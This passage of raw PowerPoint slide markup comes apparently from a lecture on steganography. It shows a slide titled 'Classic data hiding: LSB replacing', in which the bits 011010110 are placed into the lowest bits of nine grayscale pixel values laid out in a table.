                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>17 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>49</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2529976" y="5842034"/>
            <a:ext cx="3996515" cy="305020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1982" spc="198" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333B2"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype"/>
                <a:cs typeface="Palatino Linotype"/>
              </a:rPr>
              <a:t>Table </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333B2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" spc="-119" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>9  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" spc="-109" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pixels </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" spc="-40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" spc="-159" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" spc="-129" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>grayscale</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" spc="50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1982" spc="-109" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:endParaRPr sz="1982">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64231324"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4747" y="88033"/>
            <a:ext cx="1215565" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7219540" y="88033"/>
            <a:ext cx="1366567" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>C. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Hiding in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>images</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549738" y="682125"/>
            <a:ext cx="5860130" cy="1067728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Classic </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>hiding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="595" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>replacing</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2204681">
              <a:spcBef>
                <a:spcPts val="2457"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-178" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Message  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-79" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>insert </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="357" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
                <a:cs typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>011010110</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Gill Sans MT"/>
              <a:cs typeface="Gill Sans MT"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3499835" y="2129033"/>
            <a:ext cx="2142633" cy="2142633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2430668" y="4655914"/>
          <a:ext cx="4268468" cy="1053058"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1422840">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1422814">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1422814">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="351028">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1001011</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2100" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT"/>
                          <a:cs typeface="Gill Sans MT"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Gill Sans MT"/>
                        <a:cs typeface="Gill Sans MT"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1001011</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2100" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT"/>
                          <a:cs typeface="Gill Sans MT"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Gill Sans MT"/>
                        <a:cs typeface="Gill Sans MT"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" spc="-60" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1001100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2100" b="1" spc="-60" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT"/>
                          <a:cs typeface="Gill Sans MT"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Gill Sans MT"/>
                        <a:cs typeface="Gill Sans MT"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="351028">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1001001</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2100" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT"/>
                          <a:cs typeface="Gill Sans MT"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Gill Sans MT"/>
                        <a:cs typeface="Gill Sans MT"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1001011</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2100" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT"/>
                          <a:cs typeface="Gill Sans MT"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Gill Sans MT"/>
                        <a:cs typeface="Gill Sans MT"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" spc="-60" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1001100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2100" b="1" spc="-60" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT"/>
                          <a:cs typeface="Gill Sans MT"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Gill Sans MT"/>
                        <a:cs typeface="Gill Sans MT"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="351002">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1001001</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2100" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT"/>
                          <a:cs typeface="Gill Sans MT"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Gill Sans MT"/>
                        <a:cs typeface="Gill Sans MT"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marR="67945" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1001011</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2100" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT"/>
                          <a:cs typeface="Gill Sans MT"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Gill Sans MT"/>
                        <a:cs typeface="Gill Sans MT"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2100" spc="-60" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>1001100</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2100" b="1" spc="-60" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Gill Sans MT"/>
                          <a:cs typeface="Gill Sans MT"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr sz="2100">
                        <a:latin typeface="Gill Sans MT"/>
                        <a:cs typeface="Gill Sans MT"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="5054">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
